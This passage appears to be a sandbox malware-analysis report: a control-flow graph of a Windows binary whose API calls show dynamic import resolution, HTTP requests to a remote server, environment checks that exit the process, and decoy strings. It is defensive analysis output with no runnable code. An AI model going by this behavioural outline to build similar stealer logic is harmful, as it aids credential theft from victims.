4045c0 34 API calls 26735->26736 26737 4030c3 26736->26737 26738 4045c0 34 API calls 26737->26738 26739 4030dc 26738->26739 26740 4045c0 34 API calls 26739->26740 26741 4030f5 26740->26741 26742 4045c0 34 API calls 26741->26742 26743 40310e 26742->26743 26744 4045c0 34 API calls 26743->26744 26745 403127 26744->26745 26746 4045c0 34 API calls 26745->26746 26747 403140 26746->26747 26748 4045c0 34 API calls 26747->26748 26749 403159 26748->26749 26750 4045c0 34 API calls 26749->26750 26751 403172 26750->26751 26752 4045c0 34 API calls 26751->26752 26753 40318b 26752->26753 26754 4045c0 34 API calls 26753->26754 26755 4031a4 26754->26755 26756 4045c0 34 API calls 26755->26756 26757 4031bd 26756->26757 26758 4045c0 34 API calls 26757->26758 26759 4031d6 26758->26759 26760 4045c0 34 API calls 26759->26760 26761 4031ef 26760->26761 26762 4045c0 34 API calls 26761->26762 26763 403208 26762->26763 26764 4045c0 34 API calls 26763->26764 26765 403221 26764->26765 26766 4045c0 34 API calls 26765->26766 26767 40323a 26766->26767 26768 4045c0 34 API calls 26767->26768 26769 403253 26768->26769 26770 4045c0 34 API calls 26769->26770 26771 40326c 26770->26771 26772 4045c0 34 API calls 26771->26772 26773 403285 26772->26773 26774 4045c0 34 API calls 26773->26774 26775 40329e 26774->26775 26776 4045c0 34 API calls 26775->26776 26777 4032b7 26776->26777 26778 4045c0 34 API calls 26777->26778 26779 4032d0 26778->26779 26780 4045c0 34 API calls 26779->26780 26781 4032e9 26780->26781 26782 4045c0 34 API calls 26781->26782 26783 403302 26782->26783 26784 4045c0 34 API calls 26783->26784 26785 40331b 26784->26785 26786 4045c0 34 API calls 26785->26786 26787 403334 26786->26787 26788 4045c0 34 API calls 26787->26788 26789 40334d 26788->26789 26790 4045c0 34 API calls 26789->26790 26791 403366 26790->26791 26792 4045c0 34 API calls 26791->26792 26793 40337f 26792->26793 26794 4045c0 34 API calls 26793->26794 26795 403398 26794->26795 26796 4045c0 34 API calls 26795->26796 26797 4033b1 26796->26797 26798 4045c0 34 API calls 26797->26798 26799 4033ca 26798->26799 26800 4045c0 34 API calls 26799->26800 26801 4033e3 26800->26801 26802 4045c0 34 API calls 26801->26802 26803 4033fc 26802->26803 26804 4045c0 34 API calls 26803->26804 26805 403415 26804->26805 26806 4045c0 34 API calls 26805->26806 26807 40342e 26806->26807 26808 4045c0 34 API calls 26807->26808 26809 403447 26808->26809 26810 4045c0 34 API calls 26809->26810 26811 403460 26810->26811 26812 4045c0 34 API calls 26811->26812 26813 403479 26812->26813 26814 4045c0 34 API calls 26813->26814 26815 403492 26814->26815 26816 4045c0 34 API calls 26815->26816 26817 4034ab 26816->26817 26818 4045c0 34 API calls 26817->26818 26819 4034c4 26818->26819 26820 4045c0 34 API calls 26819->26820 26821 4034dd 26820->26821 26822 4045c0 34 API calls 26821->26822 26823 4034f6 26822->26823 26824 4045c0 34 API calls 26823->26824 26825 40350f 26824->26825 26826 4045c0 34 API calls 26825->26826 26827 403528 26826->26827 26828 4045c0 34 API calls 26827->26828 26829 403541 26828->26829 26830 4045c0 34 API calls 26829->26830 26831 40355a 26830->26831 26832 4045c0 34 API calls 26831->26832 26833 403573 26832->26833 26834 4045c0 34 API calls 26833->26834 26835 40358c 26834->26835 26836 4045c0 34 API calls 26835->26836 26837 4035a5 26836->26837 26838 4045c0 34 API calls 26837->26838 26839 4035be 26838->26839 26840 4045c0 34 API calls 26839->26840 26841 4035d7 26840->26841 26842 4045c0 34 API calls 26841->26842 26843 4035f0 26842->26843 26844 4045c0 34 API calls 26843->26844 26845 403609 26844->26845 26846 4045c0 34 API calls 26845->26846 26847 403622 26846->26847 26848 4045c0 34 API calls 26847->26848 26849 40363b 26848->26849 26850 4045c0 34 API calls 26849->26850 26851 403654 26850->26851 26852 4045c0 34 API calls 26851->26852 26853 40366d 26852->26853 26854 4045c0 34 API calls 26853->26854 26855 403686 26854->26855 26856 4045c0 34 API calls 26855->26856 26857 40369f 26856->26857 26858 4045c0 34 API calls 26857->26858 26859 4036b8 26858->26859 26860 4045c0 34 API calls 26859->26860 26861 4036d1 26860->26861 26862 4045c0 34 API calls 26861->26862 26863 4036ea 26862->26863 26864 4045c0 34 API calls 26863->26864 26865 403703 26864->26865 26866 4045c0 34 API calls 26865->26866 26867 40371c 26866->26867 26868 4045c0 34 API calls 26867->26868 26869 403735 26868->26869 26870 4045c0 34 API calls 26869->26870 26871 40374e 26870->26871 26872 4045c0 34 API calls 26871->26872 26873 403767 26872->26873 26874 4045c0 34 API calls 26873->26874 26875 403780 26874->26875 26876 4045c0 34 API calls 26875->26876 26877 403799 26876->26877 26878 4045c0 34 API calls 26877->26878 26879 4037b2 26878->26879 26880 4045c0 34 API calls 26879->26880 26881 4037cb 26880->26881 26882 4045c0 34 API calls 26881->26882 26883 4037e4 26882->26883 26884 4045c0 34 API calls 26883->26884 26885 4037fd 26884->26885 26886 4045c0 34 API calls 26885->26886 26887 403816 26886->26887 26888 4045c0 34 API calls 26887->26888 26889 40382f 26888->26889 26890 4045c0 34 API calls 26889->26890 26891 403848 26890->26891 26892 4045c0 34 API calls 26891->26892 26893 403861 26892->26893 26894 4045c0 34 API calls 26893->26894 26895 40387a 26894->26895 26896 4045c0 34 API calls 26895->26896 26897 403893 26896->26897 26898 4045c0 34 API calls 26897->26898 26899 4038ac 26898->26899 26900 4045c0 34 API calls 26899->26900 26901 4038c5 26900->26901 26902 4045c0 34 API calls 26901->26902 26903 4038de 26902->26903 26904 4045c0 34 API calls 26903->26904 26905 4038f7 26904->26905 26906 4045c0 34 API calls 26905->26906 26907 403910 26906->26907 26908 4045c0 34 API calls 26907->26908 26909 403929 26908->26909 26910 4045c0 34 API calls 26909->26910 26911 403942 26910->26911 26912 4045c0 34 API calls 26911->26912 26913 40395b 26912->26913 26914 4045c0 34 API calls 26913->26914 26915 403974 26914->26915 26916 4045c0 34 API calls 26915->26916 26917 40398d 26916->26917 26918 4045c0 34 API calls 26917->26918 26919 4039a6 26918->26919 26920 4045c0 34 API calls 26919->26920 26921 4039bf 26920->26921 26922 4045c0 34 API calls 26921->26922 26923 4039d8 26922->26923 26924 4045c0 34 API calls 26923->26924 26925 4039f1 26924->26925 26926 4045c0 34 API calls 26925->26926 26927 403a0a 26926->26927 26928 4045c0 34 API calls 26927->26928 26929 403a23 26928->26929 26930 4045c0 34 API calls 26929->26930 26931 403a3c 26930->26931 26932 4045c0 34 API calls 26931->26932 26933 403a55 26932->26933 26934 4045c0 34 API calls 26933->26934 26935 403a6e 26934->26935 26936 4045c0 34 API calls 26935->26936 26937 403a87 26936->26937 26938 4045c0 34 API calls 26937->26938 26939 403aa0 26938->26939 26940 4045c0 34 API calls 26939->26940 26941 403ab9 26940->26941 26942 4045c0 34 API calls 26941->26942 26943 403ad2 26942->26943 26944 4045c0 34 API calls 26943->26944 26945 403aeb 26944->26945 26946 4045c0 34 API calls 26945->26946 26947 403b04 26946->26947 26948 4045c0 34 API calls 26947->26948 26949 403b1d 26948->26949 26950 4045c0 34 API calls 26949->26950 26951 403b36 26950->26951 26952 4045c0 34 API calls 26951->26952 26953 403b4f 26952->26953 26954 4045c0 34 API calls 26953->26954 26955 403b68 26954->26955 26956 4045c0 34 API calls 26955->26956 26957 403b81 26956->26957 26958 4045c0 34 API calls 26957->26958 26959 403b9a 26958->26959 26960 4045c0 34 API calls 26959->26960 26961 403bb3 26960->26961 26962 4045c0 34 API calls 26961->26962 26963 403bcc 26962->26963 26964 4045c0 34 API calls 26963->26964 26965 403be5 26964->26965 26966 4045c0 34 API calls 26965->26966 26967 403bfe 26966->26967 26968 4045c0 34 API calls 26967->26968 26969 403c17 26968->26969 26970 4045c0 34 API calls 26969->26970 26971 403c30 26970->26971 26972 4045c0 34 API calls 26971->26972 26973 403c49 26972->26973 26974 4045c0 34 API calls 26973->26974 26975 403c62 26974->26975 26976 4045c0 34 API calls 26975->26976 26977 403c7b 26976->26977 26978 4045c0 34 API calls 26977->26978 26979 403c94 26978->26979 26980 4045c0 34 API calls 26979->26980 26981 403cad 26980->26981 26982 4045c0 34 API calls 26981->26982 26983 403cc6 26982->26983 26984 4045c0 34 API calls 26983->26984 26985 403cdf 26984->26985 26986 4045c0 34 API calls 26985->26986 26987 403cf8 26986->26987 26988 4045c0 34 API calls 26987->26988 26989 403d11 26988->26989 26990 4045c0 34 API calls 26989->26990 26991 403d2a 26990->26991 26992 4045c0 34 API calls 26991->26992 26993 403d43 26992->26993 26994 4045c0 34 API calls 26993->26994 26995 403d5c 26994->26995 26996 4045c0 34 API calls 26995->26996 26997 403d75 26996->26997 26998 4045c0 34 API calls 26997->26998 26999 403d8e 26998->26999 27000 4045c0 34 API calls 26999->27000 27001 403da7 27000->27001 27002 4045c0 34 API calls 27001->27002 27003 403dc0 27002->27003 27004 4045c0 34 API calls 27003->27004 27005 403dd9 27004->27005 27006 4045c0 34 API calls 27005->27006 27007 403df2 27006->27007 27008 4045c0 34 API calls 27007->27008 27009 403e0b 27008->27009 27010 4045c0 34 API calls 27009->27010 27011 403e24 27010->27011 27012 4045c0 34 API calls 27011->27012 27013 403e3d 27012->27013 27014 4045c0 34 API calls 27013->27014 27015 403e56 27014->27015 27016 4045c0 34 API calls 27015->27016 27017 403e6f 27016->27017 27018 4045c0 34 API calls 27017->27018 27019 403e88 27018->27019 27020 4045c0 34 API calls 27019->27020 27021 403ea1 27020->27021 27022 4045c0 34 API calls 27021->27022 27023 403eba 27022->27023 27024 4045c0 34 API calls 27023->27024 27025 403ed3 27024->27025 27026 4045c0 34 API calls 27025->27026 27027 403eec 27026->27027 27028 4045c0 34 API calls 27027->27028 27029 403f05 27028->27029 27030 4045c0 34 API calls 27029->27030 27031 403f1e 27030->27031 27032 4045c0 34 API calls 27031->27032 27033 403f37 27032->27033 27034 4045c0 34 API calls 27033->27034 27035 403f50 27034->27035 27036 4045c0 34 API calls 27035->27036 27037 403f69 27036->27037 27038 4045c0 34 API calls 27037->27038 27039 403f82 27038->27039 27040 4045c0 34 API calls 27039->27040 27041 403f9b 27040->27041 27042 4045c0 34 API calls 27041->27042 27043 403fb4 27042->27043 27044 4045c0 34 API calls 27043->27044 27045 403fcd 27044->27045 27046 4045c0 34 API calls 27045->27046 27047 403fe6 27046->27047 27048 4045c0 34 API calls 27047->27048 27049 403fff 27048->27049 27050 4045c0 34 API calls 27049->27050 27051 404018 27050->27051 27052 4045c0 34 API calls 27051->27052 27053 404031 27052->27053 27054 4045c0 34 API calls 27053->27054 27055 40404a 27054->27055 27056 4045c0 34 API calls 27055->27056 27057 404063 27056->27057 27058 4045c0 34 API calls 27057->27058 27059 40407c 27058->27059 27060 4045c0 34 API calls 27059->27060 27061 404095 27060->27061 27062 4045c0 34 API calls 27061->27062 27063 4040ae 27062->27063 27064 4045c0 34 API calls 27063->27064 27065 4040c7 27064->27065 27066 4045c0 34 API calls 27065->27066 27067 4040e0 27066->27067 27068 4045c0 34 API calls 27067->27068 27069 4040f9 27068->27069 27070 4045c0 34 API calls 27069->27070 27071 404112 27070->27071 27072 4045c0 34 API calls 27071->27072 27073 40412b 27072->27073 27074 4045c0 34 API calls 27073->27074 27075 404144 27074->27075 27076 4045c0 34 API calls 27075->27076 27077 40415d 27076->27077 27078 4045c0 34 API calls 27077->27078 27079 404176 27078->27079 27080 4045c0 34 API calls 27079->27080 27081 40418f 27080->27081 27082 4045c0 34 API calls 27081->27082 27083 4041a8 27082->27083 27084 4045c0 34 API calls 27083->27084 27085 4041c1 27084->27085 27086 4045c0 34 API calls 27085->27086 27087 4041da 27086->27087 27088 4045c0 34 API calls 27087->27088 27089 4041f3 27088->27089 27090 4045c0 34 API calls 27089->27090 27091 40420c 27090->27091 27092 4045c0 34 API calls 27091->27092 27093 404225 27092->27093 27094 4045c0 34 API calls 27093->27094 27095 40423e 27094->27095 27096 4045c0 34 API calls 27095->27096 27097 404257 27096->27097 27098 4045c0 34 API calls 27097->27098 27099 404270 27098->27099 27100 4045c0 34 API calls 27099->27100 27101 404289 27100->27101 27102 4045c0 34 API calls 27101->27102 27103 4042a2 27102->27103 27104 4045c0 34 API calls 27103->27104 27105 4042bb 27104->27105 27106 4045c0 34 API calls 27105->27106 27107 4042d4 27106->27107 27108 4045c0 34 API calls 27107->27108 27109 4042ed 27108->27109 27110 4045c0 34 API calls 27109->27110 27111 404306 27110->27111 27112 4045c0 34 API calls 27111->27112 27113 40431f 27112->27113 27114 4045c0 34 API calls 27113->27114 27115 404338 27114->27115 27116 4045c0 34 API calls 27115->27116 27117 404351 27116->27117 27118 4045c0 34 API calls 27117->27118 27119 40436a 27118->27119 27120 4045c0 34 API calls 27119->27120 27121 404383 27120->27121 27122 4045c0 34 API calls 27121->27122 27123 40439c 27122->27123 27124 4045c0 34 API calls 27123->27124 27125 4043b5 27124->27125 27126 4045c0 34 API calls 27125->27126 27127 4043ce 27126->27127 27128 4045c0 34 API calls 27127->27128 27129 4043e7 27128->27129 27130 4045c0 34 API calls 27129->27130 27131 404400 27130->27131 27132 4045c0 34 API calls 27131->27132 27133 404419 27132->27133 27134 4045c0 34 API calls 27133->27134 27135 404432 27134->27135 27136 4045c0 34 API calls 27135->27136 27137 40444b 27136->27137 27138 4045c0 34 API calls 27137->27138 27139 404464 27138->27139 27140 4045c0 34 API calls 27139->27140 27141 40447d 27140->27141 27142 4045c0 34 API calls 27141->27142 27143 404496 27142->27143 27144 4045c0 34 API calls 27143->27144 27145 4044af 27144->27145 27146 4045c0 34 API calls 27145->27146 27147 4044c8 27146->27147 27148 4045c0 34 API calls 27147->27148 27149 4044e1 27148->27149 27150 4045c0 34 API calls 27149->27150 27151 4044fa 27150->27151 27152 4045c0 34 API calls 27151->27152 27153 404513 27152->27153 27154 4045c0 34 API calls 27153->27154 27155 40452c 27154->27155 27156 4045c0 34 API calls 27155->27156 27157 404545 27156->27157 27158 4045c0 34 API calls 27157->27158 27159 40455e 27158->27159 27160 4045c0 34 API calls 27159->27160 27161 404577 27160->27161 27162 4045c0 34 API calls 27161->27162 27163 404590 27162->27163 27164 4045c0 34 API calls 27163->27164 27165 4045a9 27164->27165 27166 419c10 27165->27166 27167 419c20 43 API calls 27166->27167 27168 41a036 8 API calls 27166->27168 27167->27168 27169 41a146 27168->27169 27170 41a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27168->27170 27171 41a153 8 API calls 27169->27171 27172 41a216 27169->27172 27170->27169 27171->27172 27173 41a298 27172->27173 27174 41a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27172->27174 27175 41a2a5 6 API calls 27173->27175 27176 41a337 27173->27176 27174->27173 27175->27176 27177 41a344 9 API calls 27176->27177 27178 41a41f 27176->27178 27177->27178 27179 41a4a2 27178->27179 27180 41a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27178->27180 27181 41a4ab GetProcAddress GetProcAddress 27179->27181 27182 41a4dc 27179->27182 27180->27179 27181->27182 27183 41a515 27182->27183 27184 41a4e5 GetProcAddress GetProcAddress 27182->27184 27185 41a612 27183->27185 27186 41a522 10 API calls 27183->27186 27184->27183 27187 41a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27185->27187 27188 41a67d 27185->27188 27186->27185 27187->27188 27189 41a686 GetProcAddress 27188->27189 27190 41a69e 27188->27190 27189->27190 27191 41a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27190->27191 27192 415ca3 27190->27192 27191->27192 27193 401590 27192->27193 27468 401670 27193->27468 27196 41a7a0 lstrcpy 27197 4015b5 27196->27197 27198 41a7a0 lstrcpy 27197->27198 27199 4015c7 27198->27199 27200 41a7a0 lstrcpy 27199->27200 27201 4015d9 27200->27201 27202 41a7a0 lstrcpy 27201->27202 27203 401663 27202->27203 27204 415510 27203->27204 27205 415521 27204->27205 27206 41a820 2 API calls 27205->27206 27207 41552e 27206->27207 27208 41a820 2 API calls 27207->27208 27209 41553b 27208->27209 27210 41a820 2 API calls 27209->27210 27211 415548 27210->27211 27212 41a740 lstrcpy 27211->27212 27213 415555 27212->27213 27214 41a740 lstrcpy 27213->27214 27215 415562 27214->27215 27216 41a740 lstrcpy 27215->27216 27217 41556f 27216->27217 27218 41a740 lstrcpy 27217->27218 27257 41557c 27218->27257 27219 4152c0 29 API calls 27219->27257 27220 4151f0 23 API calls 27220->27257 27221 415643 StrCmpCA 27221->27257 27222 4156a0 StrCmpCA 27223 4157dc 27222->27223 27222->27257 27224 41a8a0 lstrcpy 27223->27224 27225 4157e8 27224->27225 27227 41a820 2 API calls 27225->27227 27226 41a820 lstrlenA lstrcpy 27226->27257 27229 4157f6 27227->27229 27228 41a740 lstrcpy 27228->27257 27231 41a820 2 API calls 27229->27231 27230 415856 StrCmpCA 27232 415991 27230->27232 27230->27257 27234 415805 27231->27234 27233 41a8a0 lstrcpy 27232->27233 27235 41599d 27233->27235 27236 401670 lstrcpy 27234->27236 27237 41a820 2 API calls 27235->27237 27255 415811 27236->27255 27238 4159ab 27237->27238 27241 41a820 2 API calls 27238->27241 27239 415a0b StrCmpCA 27242 415a16 Sleep 27239->27242 27243 415a28 27239->27243 27240 41a7a0 lstrcpy 27240->27257 27245 4159ba 27241->27245 27242->27257 27244 41a8a0 lstrcpy 27243->27244 27246 415a34 27244->27246 27248 401670 lstrcpy 27245->27248 27249 41a820 2 API calls 27246->27249 27247 401590 lstrcpy 27247->27257 27248->27255 27250 415a43 27249->27250 27251 41a820 2 API calls 27250->27251 27252 415a52 27251->27252 27254 401670 lstrcpy 27252->27254 27253 41578a StrCmpCA 27253->27257 27254->27255 27255->26314 27256 41593f StrCmpCA 27256->27257 27257->27219 27257->27220 27257->27221 27257->27222 27257->27226 27257->27228 27257->27230 27257->27239 27257->27240 27257->27247 27257->27253 27257->27256 27258 41a8a0 lstrcpy 27257->27258 27258->27257 27260 417553 GetVolumeInformationA 27259->27260 27261 41754c 27259->27261 27267 417591 27260->27267 27261->27260 27262 4175fc GetProcessHeap HeapAlloc 27263 417619 27262->27263 27264 417628 wsprintfA 27262->27264 27265 41a740 lstrcpy 27263->27265 27266 41a740 lstrcpy 27264->27266 27268 415da7 27265->27268 27266->27268 27267->27262 27268->26335 27270 41a7a0 lstrcpy 27269->27270 27271 404899 27270->27271 27477 4047b0 27271->27477 27273 4048a5 27274 41a740 lstrcpy 27273->27274 27275 4048d7 27274->27275 27276 41a740 lstrcpy 27275->27276 27277 4048e4 27276->27277 27278 41a740 lstrcpy 27277->27278 27279 4048f1 27278->27279 27280 41a740 lstrcpy 27279->27280 27281 4048fe 27280->27281 27282 41a740 lstrcpy 27281->27282 27283 40490b InternetOpenA StrCmpCA 27282->27283 27284 404944 27283->27284 27285 404955 27284->27285 27286 404ecb InternetCloseHandle 27284->27286 27490 418b60 GetSystemTime lstrcpy lstrcpy 27285->27490 27288 404ee8 27286->27288 27485 409ac0 CryptStringToBinaryA 27288->27485 27289 404963 27491 41a920 lstrcpy lstrcpy lstrcatA 27289->27491 27292 404976 27294 41a8a0 lstrcpy 27292->27294 27299 40497f 27294->27299 27295 41a820 2 API calls 27296 404f05 27295->27296 27298 41a9b0 4 API calls 27296->27298 27297 404f27 ctype 27301 41a7a0 lstrcpy 27297->27301 27300 404f1b 27298->27300 27303 41a9b0 4 API calls 27299->27303 27302 41a8a0 lstrcpy 27300->27302 27314 404f57 27301->27314 27302->27297 27304 4049a9 27303->27304 27305 41a8a0 lstrcpy 27304->27305 27306 4049b2 27305->27306 27307 41a9b0 4 API calls 27306->27307 27308 4049d1 27307->27308 27309 41a8a0 lstrcpy 27308->27309 27310 4049da 27309->27310 27492 41a920 lstrcpy lstrcpy lstrcatA 27310->27492 27312 4049f8 27313 41a8a0 lstrcpy 27312->27313 27315 404a01 27313->27315 27314->26338 27316 41a9b0 4 API calls 27315->27316 27317 404a20 27316->27317 27318 41a8a0 lstrcpy 27317->27318 27319 404a29 27318->27319 27320 41a9b0 4 API calls 27319->27320 27321 404a48 27320->27321 27322 41a8a0 lstrcpy 27321->27322 27323 404a51 27322->27323 27324 41a9b0 4 API calls 27323->27324 27325 404a7d 27324->27325 27493 41a920 lstrcpy lstrcpy lstrcatA 27325->27493 27327 404a84 27328 41a8a0 lstrcpy 27327->27328 27329 404a8d 27328->27329 27330 404aa3 InternetConnectA 27329->27330 27330->27286 27331 404ad3 HttpOpenRequestA 27330->27331 27333 404b28 27331->27333 27334 404ebe InternetCloseHandle 27331->27334 27335 41a9b0 4 API calls 27333->27335 27334->27286 27336 404b3c 27335->27336 27337 41a8a0 lstrcpy 27336->27337 27338 404b45 27337->27338 27494 41a920 lstrcpy lstrcpy lstrcatA 27338->27494 27340 404b63 27341 41a8a0 lstrcpy 27340->27341 27342 404b6c 27341->27342 27343 41a9b0 4 API calls 27342->27343 27344 404b8b 27343->27344 27345 41a8a0 lstrcpy 27344->27345 27346 404b94 27345->27346 27347 41a9b0 4 API calls 27346->27347 27348 404bb5 27347->27348 27349 41a8a0 lstrcpy 27348->27349 27350 404bbe 27349->27350 27351 41a9b0 4 API calls 27350->27351 27352 404bde 27351->27352 27353 41a8a0 lstrcpy 27352->27353 27354 404be7 27353->27354 27355 41a9b0 4 API calls 27354->27355 27356 404c06 27355->27356 27357 41a8a0 lstrcpy 27356->27357 27358 404c0f 27357->27358 27495 41a920 lstrcpy lstrcpy lstrcatA 27358->27495 27360 404c2d 27361 41a8a0 lstrcpy 27360->27361 27362 404c36 27361->27362 27363 41a9b0 4 API calls 27362->27363 27364 404c55 27363->27364 27365 41a8a0 lstrcpy 27364->27365 27366 404c5e 27365->27366 27367 41a9b0 4 API calls 27366->27367 27368 404c7d 27367->27368 27369 41a8a0 lstrcpy 27368->27369 27370 404c86 27369->27370 27496 41a920 lstrcpy lstrcpy lstrcatA 27370->27496 27372 404ca4 27373 41a8a0 lstrcpy 27372->27373 27374 404cad 27373->27374 27375 41a9b0 4 API calls 27374->27375 27376 404ccc 27375->27376 27377 41a8a0 lstrcpy 27376->27377 27378 404cd5 27377->27378 27379 41a9b0 4 API calls 27378->27379 27380 404cf6 27379->27380 27381 41a8a0 lstrcpy 27380->27381 27382 404cff 27381->27382 27383 41a9b0 4 API calls 27382->27383 27384 404d1f 27383->27384 27385 41a8a0 lstrcpy 27384->27385 27386 404d28 27385->27386 27387 41a9b0 4 API calls 27386->27387 27388 404d47 27387->27388 27389 41a8a0 lstrcpy 27388->27389 27390 404d50 27389->27390 27497 41a920 lstrcpy lstrcpy lstrcatA 27390->27497 27392 404d6e 27393 41a8a0 lstrcpy 27392->27393 27394 404d77 27393->27394 27395 41a740 lstrcpy 27394->27395 27396 404d92 27395->27396 27498 41a920 lstrcpy lstrcpy lstrcatA 27396->27498 27398 404db3 27499 41a920 lstrcpy lstrcpy lstrcatA 27398->27499 27400 404dba 27401 41a8a0 lstrcpy 27400->27401 27402 404dc6 27401->27402 27403 404de7 lstrlenA 27402->27403 27404 404dfa 27403->27404 27405 404e03 lstrlenA 27404->27405 27500 41aad0 27405->27500 27407 404e13 HttpSendRequestA 27408 404e32 InternetReadFile 27407->27408 27409 404e67 InternetCloseHandle 27408->27409 27414 404e5e 27408->27414 27411 41a800 27409->27411 27411->27334 27412 41a9b0 4 API calls 27412->27414 27413 41a8a0 lstrcpy 27413->27414 27414->27408 27414->27409 27414->27412 27414->27413 27505 41aad0 27415->27505 27417 4117c4 StrCmpCA 27418 4117d7 27417->27418 27419 4117cf ExitProcess 27417->27419 27420 4117e7 strtok_s 27418->27420 27423 4117f4 27420->27423 27421 4119c2 27421->26340 27422 41199e strtok_s 27422->27423 27423->27421 27423->27422 27424 4118ad StrCmpCA 27423->27424 27425 4118cf StrCmpCA 27423->27425 27426 4118f1 StrCmpCA 27423->27426 27427 411951 StrCmpCA 27423->27427 27428 411970 StrCmpCA 27423->27428 27429 411913 StrCmpCA 27423->27429 27430 411932 StrCmpCA 27423->27430 27431 41185d StrCmpCA 27423->27431 27432 41187f StrCmpCA 27423->27432 27433 41a820 lstrlenA lstrcpy 27423->27433 27434 41a820 2 API calls 27423->27434 27424->27423 27425->27423 27426->27423 27427->27423 27428->27423 27429->27423 27430->27423 27431->27423 27432->27423 27433->27423 27434->27422 27435->26346 27436->26348 27437->26354 27438->26356 27439->26362 27440->26364 27441->26368 27442->26372 27443->26376 27444->26382 27445->26384 27446->26388 27447->26402 27448->26406 27449->26405 27450->26401 27451->26405 27452->26423 27453->26408 27454->26412 27455->26414 27456->26419 27457->26420 27458->26426 27459->26433 27460->26435 27461->26459 27462->26462 27463->26463 27464->26458 27465->26463 27466->26472 27469 41a7a0 lstrcpy 27468->27469 27470 401683 27469->27470 27471 41a7a0 lstrcpy 27470->27471 27472 401695 27471->27472 27473 41a7a0 lstrcpy 27472->27473 27474 4016a7 27473->27474 27475 41a7a0 lstrcpy 27474->27475 27476 4015a3 27475->27476 27476->27196 27501 401030 27477->27501 27481 404838 lstrlenA 27504 41aad0 27481->27504 27483 404848 InternetCrackUrlA 27484 404867 27483->27484 27484->27273 27486 409af9 LocalAlloc 27485->27486 27487 404eee 27485->27487 27486->27487 27488 409b14 CryptStringToBinaryA 27486->27488 27487->27295 27487->27297 27488->27487 27489 409b39 LocalFree 27488->27489 27489->27487 27490->27289 27491->27292 27492->27312 27493->27327 27494->27340 27495->27360 27496->27372 27497->27392 27498->27398 27499->27400 27500->27407 27502 40103a ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 27501->27502 27503 41aad0 27502->27503 27503->27481 27504->27483 27505->27417 27639 416ab1 903 API calls 27608 4069f3 7 API calls 27640 40a6ebc VirtualProtect 27575 40b04b7 88 API calls 27576 40b0cb6 30 API calls 27644 41cafe 219 API calls 5 library calls 27579 40b15b3 strtok_s 27673 40b13c7 strtok_s strtok_s lstrlen lstrcpy 26079 401190 26086 4178e0 GetProcessHeap HeapAlloc GetComputerNameA 26079->26086 26081 40119e 26082 4011cc 26081->26082 26088 417850 GetProcessHeap HeapAlloc GetUserNameA 26081->26088 26084 4011b7 26084->26082 26085 4011c4 ExitProcess 26084->26085 26087 417939 26086->26087 26087->26081 26089 4178c3 26088->26089 26089->26084 27580 40b3823 7 API calls 27581 40b30d0 9 API calls 27652 41ce9f 69 API calls __amsg_exit 27585 40bcce9 162 API calls ___crtGetStringTypeA 27586 4088a4 RaiseException task __CxxThrowException@8 27587 4180a5 GetProcessHeap HeapFree 27611 40b19e7 StrCmpCA ExitProcess strtok_s strtok_s 27612 40b35e4 9 API calls 27613 41b9b0 RtlUnwind 27588 40b30f9 7 API calls 27589 40af8f1 32 API calls

                        Control-flow Graph

                        APIs
                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045CC
                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045D7
                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045E2
                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045ED
                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045F8
                        • GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,004169FB), ref: 00404607
                        • RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,004169FB), ref: 0040460E
                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040461C
                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404627
                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404632
                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040463D
                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404648
                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040465C
                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404667
                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404672
                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040467D
